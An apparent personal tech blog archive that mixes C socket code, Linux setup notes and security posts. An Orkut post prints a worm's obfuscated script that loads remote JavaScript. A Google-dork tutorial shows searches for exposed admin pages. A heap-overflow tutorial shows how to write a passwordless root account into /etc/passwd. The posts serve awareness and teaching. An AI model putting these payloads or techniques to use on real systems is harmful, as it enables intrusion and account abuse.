srv.sin_port = htons(PORT);
inet_pton(AF_INET, IP, &srv.sin_addr);

if ((clifd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket clifd");
exit(1);
}

if (connect(clifd, (struct sockaddr *) &srv, sizeof(srv)) < 0)
{
perror("connect");
exit(1);
}

nonblock(clifd);
for (n = 0; (n < MAX_CLIENT) && (clifd != -1); n++)
{
if (list[n] == 0)
{
#ifdef DEBUG
printf("Connected. fd: %d\n", clifd);
#endif
list[n] = clifd;
clifd = -1;
}
}

if (clifd != -1)
printf("list FULL"); /* Should not reach here */
}

void set_list()
{
int n;
FD_ZERO(&fdset);

for (n = 0; n < MAX_CLIENT; n++)
if (list[n] != 0)
{
FD_SET(list[n], &fdset);
if (list[n] > highfd)
highfd = list[n];
}
}

void recv_data(int num)
{
int n;
char buffer[1024];
n = recv(list[num], buffer, 1023, 0);
if (n > 0)
{
#ifdef DEBUG
printf("%d bytes echoed from %d\n", n, list[num]);
printf("%s", buffer);
#endif
}
else if (n < 0)
{
if (errno != EAGAIN)
printf("client %d disconnected\n", list[num]);
}
else if (n == 0)
printf("client %d disconnected\n", list[num]);
}


void send_data(int num)
{
int n;
char buffer[1024];
memset(buffer, '\0', 1024);
printf("Enter the message to send: ");
fgets(buffer, 1014, stdin);
strncat(buffer, "--list[%d]", num);
if ((n = send(list[num], buffer, strlen(buffer), 0)) > 0)
{
#ifdef DEBUG
printf("%d bytes sent from %d\n", n, list[num]);
#endif
}
}

void scan_clients()
{
#ifdef DEBUG
printf("scan_clients\n");
#endif
int num;

for (num = 0; num < MAX_CLIENT; num++)
if (FD_ISSET(list[num], &fdset))
recv_data(num);

for (num = 0; num < MAX_CLIENT; num++)
send_data(num);
}

int main()
{
int readsocks;
int i = 0;
struct timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 10;

for (i = 0; i < MAX_CLIENT; i++)
list[i] = 0;
for (i = 0; i < MAX_CLIENT; i++)
cli_con();
for (i = 0; i < MAX_CLIENT; i++)
printf ("list[%d] = %d\n",i,list[i]);

/* i = 0; Not needed now */
do
{
set_list();
readsocks = select(highfd + 1, &fdset, NULL, NULL, &tv);
if (readsocks < 0)
{
perror("select\n");
exit(1);
}

/*printf("else scan_clients\n");*/
scan_clients();
#ifdef DEBUG
sleep(4);
#endif
} while (0);

return 0;
}

Orkut Java Scripts

2008-01-31T11:00:00.001+05:30

There was a javascript from my friend on Orkut. I thought I will try it for fun. This was the script:

javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))

After executing the script, i tried to visit the orkut page. This was the result

Immediately I realised that its a recursive script which sends some message to all my friends. After 3 minutes (After the script finished running), i got into my orkut and checked my friends scrapbooks. There was my scrap on all their scrapbooks, with the above script.

Since the script exceeded 280 friend scraps, i was not able to scrap anyone. So to avoid such inconvenience to my friends, i went to their scrapbooks and deleted them on my own.

Evening, i asked Sangeetha to decode the script. She did it in quick time with the help of this: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_fromcharcode

The decoded to this:

d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';void(0)

So, all i had to do was to post a complaint or abuse report on that coolpcstuff.googlepages.com.

Report it here

Once for all, we need to stop executing any script on orkut for that matter. At last, its our ignorance which they exploit. I hate these silly idiots.

Beware of Spams and Crackers on GMail

2008-01-31T10:24:00.000+05:30

from Gmail Administrator hide details 10:41 pm (1½ hours ago)
to visionofarun
date Sun, 16 Sep 2007 21:01:39 +0580
subject Last Warning to Prevent the Termination of your Gmail Account by updating your Account Information

Dear Gmail Member,

During our regularly scheduled account maintenance and verification procedure, we have detected a slight error in your information.

This might be due to either of the following reasons:

1. A recent change in your personal information (i.e. change of address).

2. Submitting invalid information during the initial sign up process.

3. An inability to accurately verify your selected option of subscription due to an internal error within our processors.

Please update and verify your information by clicking the link below:

http://googleverification.110mb.com/verifymyaccount/

If your account information is not updated within 72 hours then your ability to use your Gmail account will become restricted.

Sincerely,

Google Mail Administrator

Please do not reply to this e-mail. If you have general questions regarding your account, please click Help in the upper right corner for the GMail comprehensive online help.

© 2007 Google Mail Corporation. All rights reserved
---------------

I got the above mail on 15/7/2007. I believe some of you guys might have also got similar mails. Analyzing the above mail, there are few points:

1. There is no Google Mail Corporation. But simply "Google Incorporation".
2. There is no way that GMail admin will mail you mentioning some "slight error". :-) If it were, its their production issue, and they will solve it. We dont need to bother.
3. "An inability".. "within our processors.".. This is total crap. What poor language the idiot has used..
4. Here comes the last catch
http://googleverification.110mb.com/verifymyaccount/

Why should google use any domain other than google.com?? here it is 110mb.com. Only if you are a complete fool, there are chances that you will be tempted to throw your account information into the cheap idiot's pocket.

Do a bit of googling, when you find:

http://

groups.google.com/group/Gmail-ABCs/browse_thread/thread/b50be48b2d2fdad1/8033c3c55497411d

Read that..

I have already made a post on this in the Orkut forum here:

http://www.orkut.com/CommMsgs.aspx?cmm=38115513&tid=2555364279647860660

We may be ignorant about something.. But never be idiotic..

GtMess

2008-01-24T10:38:00.002+05:30

I got gtmess, a console based MSN client from here. I telnet'ed to the RHEL server and tried to build it.

./configure went without any error.

But 'make install' threw up an error, all compile errors, thankfully no link error:

gcc -DHAVE_CONFIG_H -I. -I../../src    -DDATADIR=\"/usr/local/share/gtmess\" -g -O2 -MT pass.o -MD -MP -MF .deps/pass.Tpo -c -o pass.o pass.c
In file included from /usr/include/openssl/ssl.h:179,
from pass.c:42:
/usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory
In file included from /usr/include/openssl/ssl.h:179,
from pass.c:42:
/usr/include/openssl/kssl.h:132: parse error before "krb5_enctype"
/usr/include/openssl/kssl.h:134: parse error before "FAR"
/usr/include/openssl/kssl.h:135: parse error before '}' token
/usr/include/openssl/kssl.h:147: parse error before "kssl_ctx_setstring"
/usr/include/openssl/kssl.h:147: parse error before '*' token
/usr/include/openssl/kssl.h:148: parse error before '*' token
/usr/include/openssl/kssl.h:149: parse error before '*' token
/usr/include/openssl/kssl.h:149: parse error before '*' token
/usr/include/openssl/kssl.h:150: parse error before '*' token
/usr/include/openssl/kssl.h:151: parse error before "kssl_ctx_setprinc"
/usr/include/openssl/kssl.h:151: parse error before '*' token
/usr/include/openssl/kssl.h:153: parse error before "kssl_cget_tkt"
/usr/include/openssl/kssl.h:153: parse error before '*' token
/usr/include/openssl/kssl.h:155: parse error before "kssl_sget_tkt"
/usr/include/openssl/kssl.h:155: parse error before '*' token
/usr/include/openssl/kssl.h:157: parse error before "kssl_ctx_setkey"
/usr/include/openssl/kssl.h:157: parse error before '*' token
/usr/include/openssl/kssl.h:159: parse error before "context"
/usr/include/openssl/kssl.h:160: parse error before "kssl_build_principal_2"
/usr/include/openssl/kssl.h:160: parse error before "context"
/usr/include/openssl/kssl.h:163: parse error before "kssl_validate_times"
/usr/include/openssl/kssl.h:163: parse error before "atime"
/usr/include/openssl/kssl.h:165: parse error before "kssl_check_authent"
/usr/include/openssl/kssl.h:165: parse error before '*' token
/usr/include/openssl/kssl.h:167: parse error before "enctype"
In file included from pass.c:42:
/usr/include/openssl/ssl.h:909: parse error before "KSSL_CTX"
/usr/include/openssl/ssl.h:931: parse error before '}' token
make[2]: *** [pass.o] Error 1
make[2]: Leaving directory `/home/user23/gtmess-0.94/src/client'
make[1]: *** [install-recursive] Error 1
make[1]: Leaving directory `/home/user23/gtmess-0.94/src'
make: *** [install-recursive] Error 1
[user23@icis_linux gtmess-0.94]$ cd ..

As noted, the error was

/usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory

, I found that in kssl.h, they have included krb5.h. But the complier was not able to find the file. It means that the default include path (CFLAGS) doesn't contain the path where the kbr5.h.

So, my next step was to find where it is. I gave a small find command:

find /usr -name "kbr5.h"

It showed the path as

/usr/kerberos/include

. mm, so this is because RedHat moved the kerberos headers (for OpenSSL authentication) and libraries from their expected location. I believe, this could be a problem only on RHEL 2.x. I hope that they have fixed it on RHEL 4.

So, the solution was to

make clean
./configure CFLAGS=-I/usr/kerberos/include
make install

I dont have write permission to /usr/bin. So my intall failed. Nevertheless the binary was in ~/gtmess-0.94/src/client/ folder. I copied that to my ~/bin folder, so that it will run without any dependencies. It is just a static build. So, no complexities.

Before using gtmess, run

gtmess --help

and also read the README file. The picture shows a sample conversation with Akka..

My .vimrc

2008-01-24T02:57:00.001+05:30

set nocompatible
" source $VIMRUNTIME/vimrc_example.vim
" source $VIMRUNTIME/mswin.vim
" behave mswin

set ts=4
set expandtab
set nu
set nocp incsearch
set cinoptions=:0,p0,t0
set cinwords=if,else,while,do,for,switch,case
set formatoptions=tcqr
set autoindent
set shiftwidth=4
set hlsearch
set smartcase
set ic
"set confirm
set showcmd
set ruler
set restorescreen
set wildmode=longest,full
set km=startsel
set slm=mouse,key
"
" John Dierdorf changes to function keys
"
map  :w
map  :q
map  :x
map  gq}
imap  w
imap  q
imap  x
imap  q}
imap 
autocmd FileType * set formatoptions=tcql nocindent comments&
autocmd Filetype c,cpp,h set formatoptions=croql cindent comments=sr:/*,mb:*,ex:*/,://
autocmd BufReadPre *.t*xt set linebreak textwidth=72
" colors ron

The code listed here doesn't show the escape characters. So better download it in the link given below. All my friends use this file. So you should not face any problem. In case you find face some problem, feel free to post a comment so that I can help. You can get my .vimrc here. When downloaded, it will not have any extension. When you ftp that on to UNIX/Linux box, you can change the name to .vimrc.

Another Windows hack: when you try to rename any file on Windows to, say, .arun or .bash_history, Windows will not allow you to save with that name. But will show you an error message saying: You must type a file name.

If you are too eager to know how to make it possible, here it is: Filezilla is able to do that for you. Open Filezilla and it will show you the directory listing for the filetransfer. You can press F2 and rename to any thing you wanted. (But definitely not the reserved keyword: con, lpt1, etc)

McAfee idiots

2008-01-24T01:14:00.001+05:30

First, you may be wondering why I am using Windows. hmm.. My display device is Intel 965 with X3100 graphics accelerator. Xorg drivers has a bug for the X3100. It is not fixed in Ubuntu Gutsy release. So, cant run compiz effect on my system. Apart from that, I am on Dell XPS 1330. So my friend pressed the Dell Mediadirect button, which deleted the GRUB partition. I lost all my data. I have decided to take the Media direct button off, when the Xorg bug is fixed and load Ubuntu.

Okay, here i come to the point.

I changed the IE foreground and background colors so that it will be convenient for me to read during night. When I opened my McAfee, I was shocked to see it without any thing on its screen. There was just a "YES" in green color. What would you think at first would have happened??

I thought that cracker has got into my system and has implanted a trojan. I run windows vista. So I have all the reasons to be afraid of. Then when i looked closely, really closely, into my screen, I found that the Update and Scan button in the McAfee home screen had fonts in white color. Then i got the point that it fetches the values from the IE pallets.

This McAfee idiots doesn't have time or patience to code that small module, which will color their own product. Instead they fetch from some other program. For God sake, they sell anti-virus products.

Please save us from these idiots. someone please come up with good open source products. My laptop hardware is not supporting the asthetic look of the compiz-fusion. If not, I have all the reasons to run Ubuntu on my lappy. Hmm.. waiting for Hardy Heron to be released, to see if they have any fix for their bug in the Xorg for Intel 965 Chipset, mobile.

Akka's Desktop with Avant Window Navigator

2008-01-23T17:36:00.001+05:30

I configured Avant Window Navigator on akka's laptop. It really gives the look of Mac. (Anu and Shyam (our thalaivar) in the picture ;-)

Here is the procedure:

1. Add the AWN repository to /etc/apt/sources.list:

echo 'deb http://download.tuxfamily.org/syzygy42 gutsy avant-window-navigator'  |  sudo tee -a /etc/apt/sources.list
echo 'deb-src http://download.tuxfamily.org/syzygy42 gutsy avant-window-navigator'  |  sudo tee -a /etc/apt/sources.list

2. Add the apt key

wget http://download.tuxfamily.org/syzygy42/reacocard.asc
sudo apt-key add reacocard.asc
rm reacocard.asc

3. Then install AWN

sudo apt-get update
sudo apt-get install avant-window-navigator-bzr awn-core-applets-bzr

You can now start AWN from Applications->Accessories->Avant Window Navigator
If you want AWN to start with your login session, then add it to your session. I hope you would know that. :-)

If you want to configure AWN (of course, you will), then

awn-manager

Although AWN is working fine, it is creating duplicate windows in AWN, for example 2 Firefox windows, 2 adobe readers, 2 package managers, etc (2 copies of what ever is running currently on my system). I have not figured out the reason yet. I will update this post once i get it.

TCP Chat

2008-01-17T20:51:00.001+05:30

I am posting here after a very long time.

This is a simple program which acts as a TCP server:

/* File:        tcpserver.c
* Author:      Arun - G0700688A
* Date:        07Jan08
* Description: This program simulates a one to one chat client, supporting not more than 1 user at a time.
*
* Author  Date     Description of change
* ------  -------  ---------------------
* Arun    07Jan08  Initial version
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define PORT 8010

void *Func(void *client)
{
char buffer[256];
int *P = (int*)client;

bzero(buffer, 256);
while (recv(*P, buffer, 255, NULL) > 0)
{
/*
* Read and write with a single socket, until the server is killed.
* Need to implement this kill part with SIGINT instead of abrupt kill
*/
printf("Arun: %s\n", buffer);
bzero(buffer, 256);
printf("Me: ");
fgets(buffer, 255, stdin);
if (send(*P, buffer, strlen(buffer)+1, NULL) < 0)
{
perror("Func: write error");
exit(1);
}
bzero(buffer, 256);
}
close(*P);
return ;
}

int main(int argc, char *argv[])
{
/* Almost same stuff - start */
int sockfd, port, clilen, newsockfd;
struct sockaddr_in serv_addr, cli_addr;
int n;
int* C;

pthread_t thread_id;

if (argc > 2)
{
fprintf(stderr,"Usage: %s [port to listen]\n",argv[0]);
exit(1);
}

sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
perror("main: socket error");
exit(1);
}

bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = INADDR_ANY;

if (argc == 1)
serv_addr.sin_port = htons(PORT);
else
port = atoi(argv[1]);
serv_addr.sin_port = htons(port);

if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0)
{
perror("main: bind error");
exit(1);
}


listen(sockfd,5);
clilen = sizeof(cli_addr);
newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
C = &newsockfd;

if (*C < 0)
{
perror("main: accept error");
exit(1);
}

if (pthread_create(&thread_id, NULL, Func, (void*)C) < 0)
{
perror("main: thread creation error");
exit(1);
}

close(sockfd); /* I don't want to listen to more than 1 client */
/* Almost same stuff - end */

pthread_join(thread_id, NULL);

return 0;
}

Here is the client:

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void error(char *msg)
{
perror(msg);
exit(0);
}

int sigflag;

int sigio_fun()
{
//    printf("Handling SIGIO\n");
sigflag = 1;
}

void sigint()
{
signal(SIGINT,sigint);
printf("SIGINT Received. I will exit now\n");
//exit(0);
}


int main(int argc, char *argv[])
{
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
char buffer[256];

if (argc < 3)
{
fprintf(stderr,"usage %s hostname port\n", argv[0]);
exit(0);
}
portno = atoi(argv[2]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);

if (sockfd < 0)
error("main: socket error");
server = gethostbyname(argv[1]);

if (server == NULL)
{
fprintf(stderr,"Error: no such host\n");
exit(0);
}

bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);

serv_addr.sin_port = htons(portno);

if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
error("main: connect error");

signal(SIGIO, (void *)sigio_fun);
signal(SIGINT, (void *)sigint);

if (fcntl(sockfd, F_SETOWN, getpid()) < 0)
error("main: F_SETOWN error");
if (fcntl(sockfd, F_SETFL, FASYNC) < 0)
error("main: F_SETFL error");

#ifdef NORMAL
printf("Arun: ");
bzero(buffer, 256);
fgets(buffer, 255, stdin);
send(sockfd, buffer, strlen(buffer), NULL);

bzero(buffer, 256);
while (recv(sockfd, buffer, 255, NULL) > 0)
{
printf("Computer: %s\n", buffer);
printf("Arun: ");
bzero(buffer, 256);
fgets(buffer, 255, stdin);
if (send(sockfd, buffer, strlen(buffer), NULL) < 0)
{
perror("main: write error");
exit(1);
}
bzero(buffer, 256);
}
#endif

#ifdef SIGNAL
while (1)
{
printf("Arun: ");
bzero(buffer, 256);
fgets(buffer, 255, stdin);
n = send(sockfd, buffer, strlen(buffer), NULL);
if (n < 0)
error("main: write error");

sigblock(sigmask(SIGIO));
while (sigflag == 0)
sigpause(0); /* wait for interrupt */

bzero(buffer, 256);
n = recv(sockfd, buffer, 255, NULL);
if (n < 0)
error("main: read error");

printf("%s\n", buffer);
sigflag = 0;
sigsetmask(0);
}
#endif

close(sockfd);
return 0;
}

You need a UNIX or Linux box to build the source and run the applications. I built in on RHEL 2.4(RedHat Enterprise Linux) and on Fedora. It is working fine.While building the client, make sure you build it with -DNORMAL or -DSIGNAL flags. If not the client program will not enter into the send or receive logic.

gcc -DNORMAL cli.c -o cli
gcc server.c -o server

Learn it this way

2007-04-13T15:42:00.000+05:30

Learn hacking this way. The PDF file is encrypted. So, if you need the password, mail me. ;-)

Linux Keyloggers

2007-04-09T13:47:00.000+05:30

An excellent writeup on the linux keyloggers can be found here

Use Google

2007-04-05T13:15:00.000+05:30

In this tutorial I am going to cover an advanced side to google hacking… If that makes sense… I see a lot of google tutorials telling you to go for the “Index of” +htpasswd and other password files. Most of these are shadowed anyway. Well, I’m going to base this tutorial on combinations. That’s right, combinations.

Combinations

You can’t Google Hack like you used to these days. A couple years ago all you had to do was search for inurl:admin.asp and you would have gotten hundreds of sites that were vulnerable. But these days that just gives you a bunch of crap, like companies trying to sell you their administrator software and such… Now you have to think of a combination of search commands and keywords to craft together to get what you want.

Now lets think about this for a minute… What exactly do we want? Admin login pages? Nah… Password lists? May be but… nah… Ah! I know… Lets try for administration pages! You know, the pages that allow the administrator to edit, delete, and configure things on their website?

First things first, we need a base keyword, how about :

inurl:edit

Not much luck. Lets try adding something to it, but what? We obviously want something that will edit a site. How about we add +intitle:admin to the search?

inurl:edit + intitle:admin

Hmm... Doesn't look good. Looks like just a bunch of manuals and instructions. You might find something there but doubtful, there's just to much junk there. Looks like we need to add in a couple of things. Lets look for a specific file extention. We do this with the filetype command. How about we add the command filetype:asp.

inurl:edit + intitle:admin + filetype:asp

Now what we are doing is searching for only files that are asp's and have "edit" in the url and "admin" in the title. We enter this in google and we do get some administration areas, but there is still alot of demos and manuals and other junk. We also get alot of Admin login's, which aren't bad, but we want to bypass the login screen. How do we do that? Well lets add a -login -password to the search:

inurl:edit + intitle:admin + filetype:asp -login -password

BINGO! This search gives you a bunch of sites that you can get admin access to. We are happy with those results, but you should try to spice things up a bit. Like adding quotes and *'s to some things:

inurl:"*edit*" + intitle:"*admin*" + filetype:asp -login -password

This gives you some other intersting things as well. I think everyone knows what the quotes do, but I don't think alot of people know what the *'s do. Well, when they are added that means as long as "edit" is within ANYTHING google will show it. Like for instance:

inurl:"*edit*"

Might bring up a site with the url as /frontpage_edit .asp. Get the point? This could be used to find a certain software your trying to exploit. For example:

intext:"Powered by*"

The possibilities are endless!

Conclusion

Well, thats that. I wrote this tutorial to once again show the power of google and at the same time show that google hacking is not dead. There is so much more to explain, so many other ways to do such things and even more! Go and explore on your own using different combinations. Look at all the poorly configured sites. But don't exploit them! Just because you can copy and paste that search string and then find a vulnerable site and deface them or steal information does not make you some super l33t h4ck3r d00d. I almost didn't write this tutorial because I was afraid it would be easy for a dishonest person or a kid on this site to mess things up. We don't need any more kiddies defacing sites and yapping their gums off about their political views. If you want to be a true hacker, then contact the admin and tell him of the problem.

BTW, if you guys were interested, that worm that used google to spread did a real number! Google this:

intitle:"This site is defaced!!!" intext:"NeverEverNoSanity WebWorm generation"

Heap Overflow

2007-04-05T12:08:00.001+05:30

This tutorial should give you a general idea of the principles of a Heap-Based Overflow with a small contrived example. At the end I will talk about defending heap-based overflows (mainly the ideas adopted in the Windows XP SP2 heap based overflow protection crap). Anyways, here it goes:

INTRODUCTION

In a program we know there are 4 main memory segmentations. You have the text, or code; the data, or bss; the heap; and the stack. The text is the portion of memory where the actual source code (in assembly) is located. The bss is the portion of memory where your global variables reside. The stack is that FILO structure that deals with all your temporary variables. The heap is the segmentation of memory that stores any dynamically allocated variables. So when you use that good old malloc call, you are grabbing a chunk of memory from the heap. The heap is basically a bunch of free/used doubly linked lists of various memory sizes. The heap grows from lower memory to higher memory while the stack grows from higher memory to lower memory. Unlike stack overflows, where we focus on overwriting a return address, heap-based overflows focus on overflowing a buffer that contains important variables AFTER the buffer. Sounds a little tricky (or maybe my wording just sucks) but let's look at it in code.

BASIC Heap-Based Overflow:

#include 
#include 


int main(int argc, char *argv[])
{
FILE = *filed;
char *userinput = malloc(20);
char *outputfile = malloc(20);


if (argc != 2)
{
printf("Usage: %s \n", argv[0]);
exit(0);
}


strcpy(outputfile, "/tmp/notes");
strcpy(userinput, argv[1]);


// lets check out the memory addresses of userinput and outputfile
printf("userinput @ %p: %s\n", userinput, userinput);
printf("outputfile @ %p: %s\n",outputfile, outputfile);


filed = fopen(outputfile, "a");
if(filed == NULL)
{
fprintf(stderr, "error opening file %s\n", outputfile);
exit(1);
}


fprintf(filed, "%s\n", userinput);
fclose(filed);
return 0;
}

All this program does is writes (appends) whatever the user inputs into the file /tmp/notes. Notice that when we allocated the memory, we allocated the userinput first, followed by the outputfile and that outputfile was copied over first. This will play a key role in allowing the heap overflow. This program needs suid privilages (so it runs as root) in order for us to usefully exploit it.

Building the code

# gcc -o heap-based-of heap-based-of.c
# chown root.root heap-based-of
# chmod u+s heap-based-of


# ./heap-based-of antionline
userinput @ 0x80498d0: antionline
outputfile @ 0x80498e8: /tmp/notes


#cat /tmp/notes
antionline


# ./heap-based-of WorkSucks
userinput @ 0x80498d0: WorkSucks
outputfile @ 0x80498e8: /tmp/notes


#cat /tmp/notes
antionline
WorkSucks

See how the program works?? Now, this is an extremely contrived example, but it will show you how a heap-based-overflow works. Remember how I mentioned that userinput was allocated first, followed by outputfile?? This can be seen by the memory addresses displayed (heap grows from lower to higher). If we have a hex calc handy (or can do this in your head), you know the distance between userinput and outputfile on the heap is 24 bytes. OK, so we know that outputfile resides 24 bytes after userinput, and the userinput is, obviously, based upon our input. Let's test out some 23 and 24 byte arguments to verify our finding.

# ./heap-based-of 12345678901234567890123
userinput @ 0x80498d0: 12345678901234567890123
outputfile @ 0x80498e8: /tmp/notes


#cat /tmp/notes
antionline
WorkSucks
12345678901234567890123


# ./heap-based-of 123456789012345678901234
userinput @ 0x80498d0: 123456789012345678901234
outputfile @ 0x80498e8: /tmp/notes
error opening 


#cat /tmp/notes
antionline
WorkSucks
12345678901234567890123

Let's try to understand what happened here. userinput is a null terminated string. When we entered our 23 byte string, it actually became a 24 byte string because of the added NULL terminator. This 24 byte, NULL terminated string worked fine and was written to /tmp/notes. Now, when we tried the 24 byte string, it actually became a 25 byte string because of the NULL terminator. This caused the program to error while trying to open the file. This prooves that 23 bytes of user input is maximum the buffer can hold. When we entered 24 bytes (25 with the null terminator), the userinput buffer overflowed into the beginning of outputfile. Because we only overflowed the buffer by 1 byte (the last byte), the NULL terminator overflows into outputfile. I will attempt a poor visual. We will assume for the sake of space that outputfile is 5 bytes after userinput in memory Here is what the heap looks like if we entered "good" (no quotes, "/0" is the NULL terminator)

HEAP

----------------
[ g ] <----- userinput
[ o ]
[ o ]
[ d ]
[ /0 ]
[ / ] <------ outputfile
[ t ]
[ m ]
[ p ]
[ / ]
[ n ]
[ o ]
[ t ]
[ e ]
[ s ]
[ /0 ]

Our program will have no trouble writing userinput to outputfile. Now lets looks at memory if we used the word "happy" (no quotes again, "/0" is our NULL terminator).HEAP

----------------
[ h ] <----- userinput
[ a ]
[ p ]
[ p ]
[ y ]
[ /0 ] <------ outputfile
[ t ]
[ m ]
[ p ]
[ / ]
[ n ]
[ o ]
[ t ]
[ e ]
[ s ]
[ /0 ]

Now our program will not run successfully, because the file it is trying to open begins with a NULL terminator. This is why the error occurs, and is how we can overflow the userinput buffer to corrupt the outputfile buffer. In stack based overflows, we could attempt to execute shellcode to spawn a remote shell, however that doesn't appear possible given our situation with the heap-based overflow. How can we manipulate the outputfile buffer to get what we want (root shell??). Think about it. If we can craft our userinput correctly, and then overflow outputfile with a different filename, we could end up writing our userinput to a completely different file. Since the program has the SUID bit set, what file immediately comes to mind?? /etc/passwd. Everyone should know what a line in /etc/passwd looks like/means, so I wont go into it. If we can add the following line to /etc/passwd, we would be in business.

rooted::0:0:me:/root:/bin/bash

However, let's check the length of this string - 30 bytes. This string will overflow the last 6 bytes - "n/bash" into the outputfile buffer. Well this doesn't help because n/bash isnt the /etc/passwd file we wanted to overwrite. So we see now that our string must end with /etc/passwd and the bytes must line up so that /etc/passwd is overflown into the outputfile buffer. First, how can we make the string end with /etc/passwd, yet actually be referring to the bash shell........SYM LINK. Check it out

# mkdir /tmp/etc
# ln -s /bin/bash /tmp/etc/passwd

So now /tmp/etc/passwd is a symlink to /bin/bash. Our input string would now look like:

rooted::0:0:me:/root:/tmp/etc/passwd

Now we need to make sure the overflown buffer will correctly aligned. In other words, we need to make sure that /etc/passwd is exactly overflown into the buffer. Well we know that 24 bytes separate our userinput from our outputfile, so we can make sure that everything before '/etc/passwd' equates to 24 bytes. This will ensure that the only thing to overflow the outputfile buffer will be /etc/passwd from the end of our input string. Right now, the # of character before '/etc/passwd' is 25 (count em). If we shrink this to 24, we might be in business. New input string

rooted::0:0:m:/root:/tmp/etc/passwd

24 bytes before /etc/passwd. OK now i am doing to draw this out in memory (like my crappy drawings before) so you can see what is exactly happening, and then I will tell you how the program handles this string. Take a look (this time I will show all 24 bytes for userinput so you get the whole picture, "/0" still means the NULL terminator).HEAP

----------------
[ r ] <----- userinput
[ o ]
[ o ]
[ t ]
[ e ]
[ d ]
[ : ]
[ : ]
[ 0 ]
[ : ]
[ 0 ]
[ : ]
[ m ]
[ : ]
[ / ]
[ r ]
[ o ]
[ o ]
[ t ]
[ : ]
[ / ]
[ t ]
[ m ]
[ p ]
[ / ] <----- outputfile
[ e ]
[ t ]
[ c ]
[ / ]
[ p ]
[ a ]
[ s ]
[ s ]
[ w ]
[ d ]
[ /0 ]

Wow.. ok, so here is what this looks like in memory, now let's understand how the program reads this and how the exploit happens. When we run the program as follows

# ./heap-based-of rooted::0:0:m:/root:/tmp/etc/passwd

The input is a NULL terminated string, so it is going to end with that NULL terminator - seen at the bottom of my little picture. The program starts placing the string we entered into memory and overflows the buffer, so memory looks exactly like the picture. Now, output file is opened so that the writing my occur. The program looks at the first memory element pointed to by outputfile (which happens to be the '/' from '/etc/passwd'). Now, since these are NULL terminated string, the outputfile string is obtained by progressing through memory until the NULL terminator is spotted. Once the NULL terminator is spotted, the string is complete. So the outputfile becomes (progressing through my memory picture from outputfile) /etc/passwd. Just start at outputfile and progress until we hit the NULL terminator and there is the string the program uses as outputfile. Success, the program has now opened /etc/passwd and will begin to append something to it. Now the program will start to write to /etc/passwd from userinput. So the program starts at userinput and progresses through memory until a NULL terminator is hit. Since we overflew the buffer, the entire string we entered will be appened to /etc/passwd (because we hit the NULL terminator at the very end). So now the program is done and has written 'rooted::0:0:m:/root:/tmp/etc/passwd' to '/etc/passwd', effectively giving us a non-passworded root account with the /bin/bash shell (SYM linked from /tmp/etc/passwd). I hope everyone followed this. This is how a very simple heap based overflow works. Heap based overflow are usually harder to spot because one must visualize the layout of memory and how it can be manipulated. Now let's look at some prevention techniques.PREVENTION OF BUFFER OVERFLOWS:Alright. I know everyone here LOVES microsoft so much (I don't mind them), so as a good example I will use their new Buffer Overflow protection methods in SP2 to give you an idea of how buffer overflows can be prevented. I hope you understand the previous example of a heap based overflow. I don't like writing just about how code can be cracked, I like to talk about prevention techniques as well, so here we go.On Intel 64 and AMD 64 chips there is a new feature called Execution Protection (NX). This feature functions on a per-virtual memory page basis. For those not familiar with virtual memory, I will briefly explain. The OS divides memory into a pages, each a specific size. The specific page size can vary between OS. Anyways, when a process wants to run, the OS sticks it into memory by asigning different pieces of code to different pages. Memory addresses and their associated pages are kept track of in the process's page table. This a very very brief and lacking explination, but basically virtual memory eliminates external fragmentation (read more on virtual memory if interested). Quick diagram...-----------------------10K page----------------------10K page----------------------10K page----------------------10K page------------------------Here is memory that the OS as split into 4 10K pages (theoretically). Now a process comes along and needs... 7K of space. So the OS will stick it in a page.-----------------------10K page----------------------Process 1----------------------10K page----------------------10K page------------------------Process 1 now has a page table that tells it what page it is in. Now let's say a process comes along that needs 30K of space and that this process has 3 functions. The OS will now break up process 2 and stick it in the remaining memory spaces. Process 2 will still operate correctly because the page table keeps track of what page it resides in.-----------------------Process 2function 1----------------------Process 1----------------------Process 2function 2----------------------Process 2function 3------------------------Due to virtual memory, we can place Process 2's code in different physical memory locations, and everything is kept in order due to the page table. Process 2's page table will say, if you want to run code from function 1, look in page 1; if you want to run code from function 2, look in page 3; and if you want to run code from function 3, look in page 4. OK this isnt a tutorial on virtual memory, but a brief understanding of it is necessary to understand NX. When I said NX functions on a per-virtual memory page basis, this means that NX associates a bit with the execution privileges of a virtual memory page. This is exactly what Windows XP SP2 does. It will mark pages by raising their NX bit to indicate that these pages are NON-executable. The NX bit is set for pages that content only data (stack, heap). If a program attempts to execute code on a virtual page with the NX bit set, the hardware will throw an exception immediately and prevent the code from executing. This prevents 